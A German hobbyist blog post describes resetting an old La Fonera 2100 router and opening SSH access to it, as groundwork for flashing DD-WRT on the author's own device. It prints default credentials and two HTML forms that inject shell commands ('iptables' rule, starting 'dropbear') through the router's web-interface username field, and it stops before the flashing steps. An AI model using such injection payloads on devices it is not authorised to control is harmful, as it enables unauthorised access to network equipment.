Joerg´s IT-Tech Blog

Microsoft Technologien und über den Tellerrand hinaus, Aber vorher das TESTEN nicht vergessen!

La Fonera 2100 Router hacken – DD-WRT

Posted by JoergS - 30. Dezember 2015

Hi,

ich hatte noch einen FON La Fonera 2100 Router rumliegen, der in der Vergangenheit ein internes Gäste-WLAN (WPA2 gesichert) und ein offenes FON-Hotspot Signal ausgestrahlt hat.

Fonera2100
Wie ich erst jetzt mitbekommen habe, hat FON den Support für den 2100 und die Hotspots abgekündigt, womit der Router nicht mehr benötigt. Aufgrund der Telekom Hotspot Flatrate kann ich mich auch an den neuen „TELEKOM_FON“ Hotspots anmelden. Weiterhin sendet meine Fritz!Box7490 jetzt ein internes und ein gesichertes Gäste-WLAN aus. Daher war die 2100 frei und ich wollte den Router als Repeater einsetzen, was mit dem freien Router OS DD-WRT funktionieren sollte.

Dazu musste ich erstmal viele Informationen Sammeln, zudem gab es z.t. widersprüchliche Informationen und Anleitungen (Vorbereitungen, Reset, Downgrade und weitere Schritte NACH SSH und SSH aktivieren). Hier meine Erfahrungen:

Meine Fonera 2100 war auch dem neuesten FON-OS 0.7.1r3. Damit musste erstmal ein Reset der Fonera machen. Dazu den Router vom LAN trennen und ca. 30s den Reset Knopf am Boden des Routers drücken.

Fonera2100-reset

Danach ca. 1-2min. warten und dann per LAN direkt vom Rechner zur Fonera verbinden. Dazu muss dem Rechner eine feste IP vergeben werden:
IP: 169.254.255.2
Subnet: 255.255.0.0 (System füllt automatisch)
Default Gateway: 169.254.255.1
DNS: 169.254.255.1

Fonera2100-rechnerip169

Jetzt kann man im Browser die IP der Fonera aufrufen http://169.254.255.1 und erhält die Fonera GUI zu sehen, sowie einen Login:
Username: root
Password: admin
eingeben.

Fonera2100-gui-start071r1

Die GUI sollte als Version „0.7.1 r1“ ausgeben, somit die Vorrausetzung für den „SSH Hack“ gegeben sind.

Jetzt folgenden folgenden Code als „step1.html“ auf der Festplatte speichern:

<html>
<head>
<title>Step 1-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 1 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

Ebenso diesen Code als als „step2.html“ auf der Festplatte speichern:

<html>
<head>
<title>Step 2-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 2 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

Dann im Browser die „step1.html“ suchen und ausführen (ACHTUNG: IE lokale Skripte erlauben! Firefox NoScript erlauben)

Fonera2100-ssh-step1

Danach im Browser die „step2.html“ suchen und ebenfalls ausführen

Fonera2100-ssh-step2

 

Schreibe einen Kommentar

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden / Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s

 
%d Bloggern gefällt das: